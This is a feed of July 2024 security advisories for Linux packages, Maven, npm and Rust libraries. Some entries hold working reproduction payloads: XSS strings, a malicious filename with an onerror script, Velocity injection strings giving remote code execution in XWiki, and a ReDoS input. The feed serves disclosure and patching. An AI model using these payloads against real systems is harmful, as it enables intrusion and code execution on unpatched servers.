24.07.2024 03:00:00	oraclelinux	[ELSA-2024-4761] containernetworking-plugins security update (important)	[1:1.4.0-4]- rebuild for CVE-2024-1394- Resolves: RHEL-40809	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4761
24.07.2024 03:00:00	oraclelinux	[ELSA-2024-4749] edk2 security update (moderate)	[20231122-6.0.1.el9_4.2]- Replace upstream references [Orabug:36569119][20231122-6.el9_4.2]- edk2-NetworkPkg-SECURITY-PATCH-CVE-2023-45237.patch [RHEL-40270 RHEL-40272]- edk2-NetworkPkg-TcpDxe-SECURITY-PATCH-CVE-2023-45236.patch [RHEL-40270 RHEL-40272]- edk2-NetworkPkg-TcpDxe-Fixed-system-stuck-on-PXE-boot-flo.patch [RHEL-40270 RHEL-40272]- edk2-MdePkg-BaseRngLib-Add-a-smoketest-for-RDRAND-and-che.patch [RHEL-40270 RHEL-40272]- edk2-SecurityPkg-RngDxe-add-rng-test.patch [RHEL-40270 RHEL-40272]- edk2-OvmfPkg-wire-up-RngDxe.patch [RHEL-40270 RHEL-40272]- edk2-CryptoPkg-Test-call-ProcessLibraryConstructorList.patch [RHEL-40270 RHEL-40272]- edk2-MdePkg-X86UnitTestHost-set-rdrand-cpuid-bit.patch [RHEL-40270 RHEL-40272]- Resolves: RHEL-40270 (CVE-2023-45237 edk2: Use of a Weak PseudoRandom Number Generator [rhel-9.4.z])- Resolves: RHEL-40272 (CVE-2023-45236 edk2: Predictable TCP Initial Sequence Numbers [rhel-9.4.z])[20231122-6.el9_4.1]- edk2-EmbeddedPkg-Hob-Integer-Overflow-in-CreateHob.patch [RHEL-30156]- edk2-StandaloneMmPkg-Hob-Integer-Overflow-in-CreateHob.patch [RHEL-30156]- Resolves: RHEL-30156 (CVE-2022-36765 edk2: integer overflow in CreateHob() could lead to HOB OOB R/W [rhel-9.4.z])	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4749
25.07.2024 02:36:13	rustsec	[RUSTSEC-2024-0359] The kstring integration in gix-attributes is unsound	`gix-attributes` (in [`state::ValueRef`](https://github.com/Byron/gitoxide/blob/gix-attributes-v0.22.2/gix-attributes/src/state.rs#L19-L27)) unsafely creates a `&str` from a `&[u8]` containing non-UTF8 data, with the justification that so long as nothing reads the `&str` and relies on it being UTF-8 in the `&str`, there is no UB:```rust// SAFETY: our API makes accessing that value as `str` impossible, so illformed UTF8 is never exposed as such.```The problem is that the non-UTF8 `str` is exposed to outside code: first to the `kstring` crate itself, which requires UTF-8 in its documentation and may have UB as a consequence of this, but also to `serde`, where it propagates to e.g. `serde_json`, `serde_yaml`, etc., where the same problems occur.This is not sound, and it could cause further UB down the line in these places that can view the `&str`.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0359
24.07.2024 01:13:25	almalinux	[ALSA-2024:4720] httpd:2.4 security update (important)	httpd:2.4 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4720
25.07.2024 17:15:33	maven	[MAVEN:GHSA-7726-43HG-M23V] OpenAM FreeMarker template injection (high)	OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default PingOne Advanced Identity Cloud login page,they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7726-43HG-M23V
25.07.2024 18:19:47	maven	[MAVEN:GHSA-P528-3MVF-GR87] Remote code execution in Spring Cloud Data Flow (critical)	In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P528-3MVF-GR87
25.07.2024 13:45:53	almalinux	[ALSA-2024:4774] linux-firmware security update (moderate)	linux-firmware security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4774
25.07.2024 11:35:20	almalinux	[ALSA-2024:4749] edk2 security update (moderate)	edk2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4749
25.07.2024 11:25:06	almalinux	[ALSA-2024:4755] libreoffice security update (moderate)	libreoffice security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4755
25.07.2024 11:13:20	almalinux	[ALSA-2024:4757] libvirt security update (moderate)	libvirt security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4757
26.07.2024 18:11:55	ubuntu	[USN-6919-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6919-1
26.07.2024 17:39:52	ubuntu	[USN-6918-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6918-1
26.07.2024 16:52:00	ubuntu	[USN-6917-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6917-1
26.07.2024 17:18:08	maven	[MAVEN:GHSA-2HJR-VMF3-XWVP] Elasticsearch Insertion of Sensitive Information into Log File (moderate)	An issue was discovered by Elastic whereby Watcher search input logged the search query results on DEBUG log level. This could lead to raw contents of documents stored in Elasticsearch to be printed in logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by removing this excessive logging. This issue only affects users that use Watcher and have a Watch defined that uses the search input and additionally have set the search input’s logger to DEBUG or finer, for example using: org.elasticsearch.xpack.watcher.input.search, org.elasticsearch.xpack.watcher.input, org.elasticsearch.xpack.watcher, or wider, since the loggers are hierarchical.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2HJR-VMF3-XWVP
26.07.2024 03:00:00	freebsd	[FREEBSD:3E917407-4B3F-11EF-8E49-001999F8D30B] Mailpit -- Content Security Policy XSS	Mailpit developer reports: A vulnerability was discovered which allowed a bad actor with SMTP access to Mailpit to bypass the Content Security Policy headers using a series of crafted HTML messages which could result in a stored XSS attack via the web UI.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3E917407-4B3F-11EF-8E49-001999F8D30B
26.07.2024 21:09:25	rustsec	[RUSTSEC-2024-0360] `XmpFile::close` can trigger UB	Affected versions of the crate failed to catch C++ exceptions raised within the `XmpFile::close` function. If such an exception occured, it would trigger undefined behavior, typically a process abort.This is best demonstrated in [issue #230](https://github.com/adobe/xmp-toolkit-rs/issues/230), where a race condition causes the `close` call to fail due to file I/O errors.This was fixed in [PR #232](https://github.com/adobe/xmp-toolkit-rs/pull/232) (released as crate version 1.9.0), which now safely handles the exception.For backward compatibility, the existing API ignores the error. A new API `XmpFile::try_close` was added to allow callers to receive and process the error result.Users of all prior versions of `xmp_toolkit` are encouraged to update to version 1.9.0 to avoid undefined behavior.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0360
26.07.2024 02:55:00	ubuntu	[USN-6200-2] ImageMagick vulnerabilities (medium)	Several security issues were fixed in ImageMagick.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6200-2
26.07.2024 14:15:21	almalinux	[ALSA-2024:4861] squid security update (moderate)	squid security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4861
26.07.2024 18:21:18	almalinux	[ALSA-2024:4567] java-11-openjdk security update (important)	java-11-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4567
27.07.2024 03:00:00	debian	[DSA-5734-2] bind9	regression update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5734-2
29.07.2024 22:47:38	npm	[NPM:GHSA-MPG4-RC92-VX8V] fast-xml-parser vulnerable to ReDOS at currency parsing (high)	### SummaryA ReDOS exists on currency.js was discovered by Gauss Security Labs R&D team.### Detailshttps://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10contains a vulnerable regex ### PoCpass the following string '\t'.repeat(13337) + '.'### ImpactDenial of service during currency parsing in experimental version 5 of fast-xml-parser-libraryhttps://gauss-security.com	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPG4-RC92-VX8V
29.07.2024 19:21:34	ubuntu	[USN-6926-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-1
29.07.2024 18:28:53	go	[GO-2024-3005] Moby authz zero length regression in github.com/moby/moby (critical)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-3005
29.07.2024 17:55:29	ubuntu	[USN-6925-1] Linux kernel vulnerability (high)	Several security issues were fixed in Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6925-1
29.07.2024 16:55:56	ubuntu	[USN-6924-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6924-1
29.07.2024 15:51:56	ubuntu	[USN-6921-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6921-1
29.07.2024 13:38:08	ubuntu	[USN-6923-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6923-1
29.07.2024 12:54:35	ubuntu	[USN-6922-1] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6922-1
29.07.2024 07:27:32	ubuntu	[USN-6916-1] Lua vulnerabilities (critical)	Several security issues were fixed in Lua.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6916-1
29.07.2024 07:18:17	ubuntu	[USN-6920-1] EDK II vulnerabilities (critical)	Several security issues were fixed in EDK II.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6920-1
29.07.2024 03:00:00	cisa	[CISA-2024:0729] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0729
31.07.2024 00:37:55	npm	[NPM:GHSA-3JCG-VX7F-J6QF] The fuels-ts typescript SDK has no awareness of to-be-spent transactions (low)	# Brief/IntroThe typescript SDK has no awareness of to-be-spent transactions causing some transactions to fail or silently get pruned as they are funded with already used UTXOs.The `Typescript SDK` provides the `fund` function which retrieves `UTXOs`, which belong to the owner and can be used to fund the request in question, from fuel's graphql api. These then get added to the request making it possible to send it to the network as it now has inputs which can be spent by its outputs. Now this works when a user only wants to fund one transaction per block as in the next block, the spent UTXO will not exist anymore. However if a user wants to fund multiple transactions within one block, the following can happen:It is important to note, that the graphql API will return a random UTXO which has enough value to fund the transaction in question.- user has 2 spendable `UTXOs` in their wallet which can cover all expenses- user funds transaction `tA` with an input gotten from the API `iA`- user submits `tA` to fuel- `iA` is still in possession of the user as no new block has been produced- user funds a transaction `tB` and gets the same input `iA` from the API- user tries to submit transaction `tB` to fuel but now one of the following can happen: - if the recipient and all other parameters are the same as in `tA`, submission will fail as `tB` will have the same `txHash` as `tA` - if the parameters are different, there will be a collision in the `txpool` and `tA` will be removed from the `txpool`# Vulnerability DetailsThe problem occurs, because the `fund` function in `fuels-ts/packages/account/src/account.ts` gets the needed ressources statelessly with the function `getResourcesToSpend` without taking into consideration already used UTXOs:```ts async fund<T extends TransactionRequest>(request: T, params: EstimatedTxParams): Promise<T> { // [...] let missingQuantities: CoinQuantity[] = []; Object.entries(quantitiesDict).forEach(([assetId, { owned, required }]) => { if (owned.lt(required)) { missingQuantities.push({ assetId, amount: required.sub(owned), }); } }); let needsToBeFunded = missingQuantities.length > 0; let fundingAttempts = 0; while (needsToBeFunded && fundingAttempts < MAX_FUNDING_ATTEMPTS) { const resources = await this.getResourcesToSpend( missingQuantities, cacheRequestInputsResourcesFromOwner(request.inputs, this.address) ); // @audit-issue here we do not exclude ids we already got and used for another transaction in the current block request.addResources(resources); // [...] } // [...] return request; }```# Impact DetailsThis issue will lead to unexpected SDK behaviour. Looking at the scenario in `Brief/Intro`, it could have the following impacts for users:1. A transaction does not get included in the `txpool` / in a block1. A previous transaction silently gets removed from the `txpool` and replaced with a new one# RecommendationI would recommend adding a buffer to the `Account` class, in which retrieved `resources` are saved. These can then be provided to `getResourcesToSpend` to be excluded from future queries but need to be removed from the buffer if their respective transaction fails to be included, in order to be able to use those `resources` again in such cases.# Proof of ConceptThe following PoC transfers 100 coins from `wallet2` to `wallet` after which `wallet2` has two `UTXOs` one with value `100` and one with a very high value (this is printed to the console). Afterwards, `wallet` will attempt transfering `80` coins back to `wallet2` twice in one block, each in a separate transaction. This should work perfectly fine as `wallet` has two `UTXOs` where each can cover the cost of each respective transaction. Now when running this one of the following will happen:1. both transfers from `wallet` to `wallet2` get a different `UTXO`. This is the case if execution is successful and `wallet2` has `80` coins more than `wallet` in the end.1. both transfers get the same `UTXO`. In this case the script will fail and throw an error as then both transactions will have the same hashIn order to execute this PoC, please deploy a local node with a blocktime of `5secs` as I wrote my PoC for that blocktime. Note that with a small change it will also work with other blocktimes. Then add the PoC to a file `poc_resources.ts` and compile it with `tsc poc_resources.ts`. Finally execute it with `node poc_resources.js`.Since the choice which `UTXO` is taken as input is random, it might take a few tries to trigger the bug!```tsimport { JsonAbi, Script, Provider, WalletUnlocked, Account, Predicate, Wallet, CoinQuantityLike, coinQuantityfy, EstimatedTxParams, BN, Coin, AbstractAddress, Address, Contract, ScriptTransactionRequest } from 'fuels';const abi: JsonAbi = { 'encoding': '1', 'types': [ { 'typeId': 0, 'type': '()', 'components': [], 'typeParameters': null } ], 'functions': [ { 'inputs': [], 'name': 'main', 'output': { 'name': '', 'type': 0, 'typeArguments': null }, 'attributes': null } ], 'loggedTypes': [], 'messagesTypes': [], 'configurables': []};const FUEL_NETWORK_URL = 'http://127.0.0.1:4000/v1/graphql';async function executeTransaction() { const provider = await Provider.create(FUEL_NETWORK_URL); const wallet: WalletUnlocked = Wallet.fromPrivateKey('0x37fa81c84ccd547c30c176b118d5cb892bdb113e8e80141f266519422ef9eefd', provider); const wallet2: WalletUnlocked = Wallet.fromPrivateKey('0xde97d8624a438121b86a1956544bd72ed68cd69f2c99555b08b1e8c51ffd511c', provider); const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms)); console.log("Balance wallet before: ", await wallet.getBalance()); console.log("Balance wallet2 before: ", await wallet2.getBalance()); wallet2.transfer(wallet.address, 100); await sleep(5500); await wallet.transfer(wallet2.address, 80); console.log('wallet -> wallet2'); await wallet.transfer(wallet2.address, 80); console.log('wallet -> wallet2'); console.log("Balance wallet after: ", await wallet.getBalance()); console.log("Balance wallet2 after: ", await wallet2.getBalance());};executeTransaction().catch(console.error);```	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3JCG-VX7F-J6QF
30.07.2024 16:20:37	ubuntu	[USN-6928-1] Python vulnerabilities (high)	Several security issues were fixed in Python.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6928-1
30.07.2024 15:04:43	ubuntu	[USN-6924-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6924-2
30.07.2024 14:26:31	ubuntu	[USN-6927-1] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6927-1
30.07.2024 13:59:46	ubuntu	[USN-6923-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6923-2
30.07.2024 13:33:56	ubuntu	[USN-6921-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6921-2
30.07.2024 19:30:37	maven	[MAVEN:GHSA-CP2C-X2PC-FPH7] Apache SeaTunnel Web Authentication vulnerability (high)	Web Authentication vulnerability in Apache SeaTunnel. Since the jwt key is hardcoded in the application, an attacker can forge any token to log in any user.Attacker can get secret key in /seatunnel-server/seatunnel-app/src/main/resources/application.yml and then create a token. This issue affects Apache SeaTunnel: 1.0.0.Users are recommended to upgrade to version 1.0.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CP2C-X2PC-FPH7
30.07.2024 18:08:49	maven	[MAVEN:GHSA-H9MQ-F6Q5-6C8M] GraphQL Java does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service (high)	GraphQL Java (aka graphql-java) before 21.5 does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service via introspection queries. 20.9 and 19.11 are also fixed versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H9MQ-F6Q5-6C8M
30.07.2024 03:00:00	cisa	[CISA-2024:0730] CISA Adds One Known Exploited Vulnerability to Catalog (medium)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0730
30.07.2024 12:59:37	curl	[CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium)	libcurl's ASN1 parser has this utf8asn1str() function used for parsing anASN.1 UTF-8 string. It can detect an invalid field and return error.Unfortunately, when doing so it also invokes `free()` on a 4 byte local stackbuffer.Most modern malloc implementations detect this error and immediately abort.Some however accept the input pointer and add that memory to its list ofavailable chunks. This leads to the overwriting of nearby stack memory. Thecontent of the overwrite is decided by the `free()` implementation; likely tobe memory pointers and a set of flags.The most likely outcome of exploting this flaw is a crash, although it cannotbe ruled out that more serious results can be had in special circumstances.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197
30.07.2024 03:00:00	freebsd	[FREEBSD:FB0B5574-4E64-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 22 security fixes: [349198731] High CVE-2024-6988: Use after free in Downloads. Reported by lime(@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group on 2024-06-25 [349342289] High CVE-2024-6989: Use after free in Loader. Reported by Anonymous on 2024-06-25 [346618785] High CVE-2024-6991: Use after free in Dawn. Reported by wgslfuzz on 2024-06-12 [339686368] Medium CVE-2024-6994: Heap buffer overflow in Layout. Reported by Huang Xilin of Ant Group Light-Year Security Lab on 2024-05-10 [343938078] Medium CVE-2024-6995: Inappropriate implementation in Fullscreen. Reported by Alesandro Ortiz on 2024-06-01 [333708039] Medium CVE-2024-6996: Race in Frames. Reported by Louis Jannett (Ruhr University Bochum) on 2024-04-10 [325293263] Medium CVE-2024-6997: Use after free in Tabs. Reported by Sven Dysthe (@svn-dys) on 2024-02-15 [340098902] Medium CVE-2024-6998: Use after free in User Education. Reported by Sven Dysthe (@svn-dys) on 2024-05-13 [340893685] Medium CVE-2024-6999: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-15 [339877158] Medium CVE-2024-7000: Use after free in CSS. Reported by Anonymous on 2024-05-11 [347509736] Medium CVE-2024-7001: Inappropriate implementation in HTML. Reported by Jake Archibald on 2024-06-17 [338233148] Low CVE-2024-7003: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-01 [40063014] Low CVE-2024-7004: Insufficient validation of untrusted input in Safe Browsing. Reported by Anonymous on 2023-02-10 [40068800] Low CVE-2024-7005: Insufficient validation of untrusted input in Safe Browsing. Reported by Umar Farooq on 2023-08-04	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FB0B5574-4E64-11EF-8A0F-A8A1599412C6
01.08.2024 04:30:39	rockylinux	[RLSA-2024:4935] freeradius security update (important)	An update is available for freeradius.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4935
01.08.2024 04:30:39	rockylinux	[RLSA-2024:4928] kernel security update (moderate)	An update is available for kernel.This update affects Rocky Linux 9.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4928
31.07.2024 21:48:41	maven	[MAVEN:GHSA-5HCJ-RWM6-XMW4] biscuit-java vulnerable to public key confusion in third party block (low)	### ImpactTokens with third-party blocks containing trusted annotations generated through a third party block request. Due to implementation issues in biscuit-java, third party block support in published versions is inoperating. Nevertheless, to synchronize with other implementations, we publish this advisory and the related fix.### DescriptionThird-party blocks can be generated without transferring the whole token to the third-party authority. Instead, a `ThirdPartyBlock` request can be sent, providing only the necessary info to generate a third-party block and to sign it:the public key of the previous block (used in the signature)the public keys part of the token symbol table (for public key interning in datalog expressions)A third-part block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair.Consider the following example (nominal case)* Authority A emits the following token: `check if thirdparty("b") trusting ${pubkeyB}`* The well-behaving holder then generates a third-party block request based on the token and sends it to third-party authority B* Third-party B generates the following third-party block `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyC}`* The token holder now must obtain a third-party block from third party C to be able to use the tokenNow, with a malicious user:* Authority A emits the following token: `check if thirdparty("b") trusting ${pubkeyB}`* The holder then attenuates the token with the following third party block `thirdparty("c")`, signed with a keypair pubkeyD, privkeyD) they generate* The holder then generates a third-party block request based on this token, but alter the `ThirdPartyBlockRequest` publicKeys field and replace pubkeyD with pubkeyC* Third-party B generates the following third-party block `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyC}`* Due to the altered symbol table, the actual meaning of the block is `thirdparty("b"); check if thirdparty("c") trusting ${pubkeyD}`* The attacker can now use the token without obtaining a third-party block from C.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5HCJ-RWM6-XMW4
31.07.2024 21:41:26	slackware	[SSA:2024-213-01] curl	New curl packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/curl-8.9.1-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: ASN.1 date parser overread. For more information, see: https://curl.se/docs/CVE-2024-7264.html https://www.cve.org/CVERecord?id=CVE-2024-7264 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/curl-8.9.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/curl-8.9.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-8.9.1-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-8.9.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:3618aed43686f0b2a099cdb4b2d279aa curl-8.9.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:1d3e767c8dbeb3cf6f9dd854ff7e194a curl-8.9.1-x86_64-1_slack15.0.txzSlackware -current package:cb1567f34933d0c50b33ae2076988879 n/curl-8.9.1-i686-1.txzSlackware x86_64 -current package:ae7d217c3fca35e0001c71244e268fb4 n/curl-8.9.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg curl-8.9.1-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-213-01
31.07.2024 21:40:26	ubuntu	[USN-6939-1] Exim vulnerability (medium)	Exim could be made to bypass a MIME filename extension-blockingprotection mechanism if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6939-1
31.07.2024 21:33:13	ubuntu	[USN-6936-1] Apache Commons Collections vulnerability (critical)	Apache Commons Collections could be made to execute arbitrary code if itreceived specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6936-1
31.07.2024 23:53:03	maven	[MAVEN:GHSA-5V8F-XX9M-WJ44] Elasticsearch stores private key on disk unencrypted (moderate)	It was discovered by Elastic engineering that when elasticsearch-certutil CLI tool is used with the csr option in order to create a new Certificate Signing Requests, the associated private key that is generated is stored on disk unencrypted even if the `--pass` parameter is passed in the command invocation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5V8F-XX9M-WJ44
31.07.2024 21:01:51	ubuntu	[USN-6913-2] phpCAS vulnerability (high)	phpCAS was vulnerable to an authentication bypass.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6913-2
31.07.2024 23:20:43	maven	[MAVEN:GHSA-692V-783F-MG8X] XWiki Platform vulnerable to Cross-Site Scripting (XSS) through conflict resolution (critical)	### ImpactBy creating a conflict when another user with more rights is currently editing a page, it is possible to execute JavaScript snippets on the side of the other user, which compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on a XWiki instance, a user with admin rights needs to edit a document without saving right away.Then, as another user without any other right than edit on the specific document, change the whole content to `<script>alert('XSS')</script>`.When the admin user then saves the document, a conflict popup appears. If they select "Fix each conflict individually" and see an alert displaying "XSS", then the instance is vulnerable.### PatchesThis has been patched in XWiki 15.10.8 and 16.3.0RC1.### WorkaroundsWe're not aware of any workaround except upgrading.### References* https://jira.xwiki.org/browse/XWIKI-21626* https://github.com/xwiki/xwiki-platform/commit/821d43ec45e67d45a6735a0717b9b77fffc1cd9f### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-692V-783F-MG8X
31.07.2024 19:01:42	ubuntu	[USN-6938-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6938-1
31.07.2024 18:46:50	ubuntu	[USN-6937-1] OpenSSL vulnerabilities (critical)	Several security issues were fixed in OpenSSL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6937-1
31.07.2024 23:20:33	maven	[MAVEN:GHSA-H63H-5C77-77P5] XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet (critical)	### ImpactAny user with edit right on any page can perform arbitrary remote code execution by adding instances of `XWiki.SearchSuggestConfig` and `XWiki.SearchSuggestSourceClass` to their user profile or any other page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an instance, as a user without script nor programming rights, add an object of type `XWiki.SearchSuggestConfig` to your profile page, and an object of type `XWiki.SearchSuggestSourceClass` as well. On this last object, set both `name` and `icon` properties to `$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')")` and `limit` and `engine` to `{{/html}}{{async}}{{velocity}}$services.logging.getLogger("attacker").error("I got programming: $services.security.authorization.hasAccess('programming')"){{/velocity}}{{/async}}`. Save and display the page. If the logs contain any message `ERROR attacker - I got programming: true` then the instance is vulnerable.### PatchesThis vulnerability has been patched in XWiki 14.10.21, 15.5.5 and 15.10.2.### WorkaroundsWe're not aware of any workaround except upgrading.### References- https://jira.xwiki.org/browse/XWIKI-21473- https://github.com/xwiki/xwiki-platform/commit/742cd4591642be4cdcaf68325f17540e0934e64e	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H63H-5C77-77P5
31.07.2024 23:20:28	maven	[MAVEN:GHSA-WF3X-JCCF-5G5G] XWiki Platform vulnerable to Cross-site Scripting through attachment filename in uploader (moderate)	### ImpactWhen uploading an attachment with a malicious filename, malicious JavaScript code could be executed. This requires a social engineering attack to get the victim into uploading a file with a malicious name. The malicious code is solely executed during the upload and affects only the user uploading the attachment. While this allows performing actions in the name of that user, it seems unlikely that a user wouldn't notice the malicious filename while uploading the attachment.In order to reproduce, as any user, create a file named `"><img src=1 onerror=alert(1)>.jpg`. Then go to any page where you have edit rights and upload the file in the attachments tab. If alerts appear and display "1", then the instance is vulnerable.### PatchesThis has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.### WorkaroundsWe're not aware of any workaround except upgrading.### References* https://jira.xwiki.org/browse/XWIKI-19611* https://jira.xwiki.org/browse/XWIKI-21769* https://jira.xwiki.org/browse/XWIKI-19602* https://github.com/xwiki/xwiki-platform/commit/910a5018a50039e8b24556573dfe342f143ef949### AttributionThis vulnerability has been independently reported by Aleksey Solovev (Positive Technologies) and Georgios Roumeliotis for TwelveSec.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WF3X-JCCF-5G5G
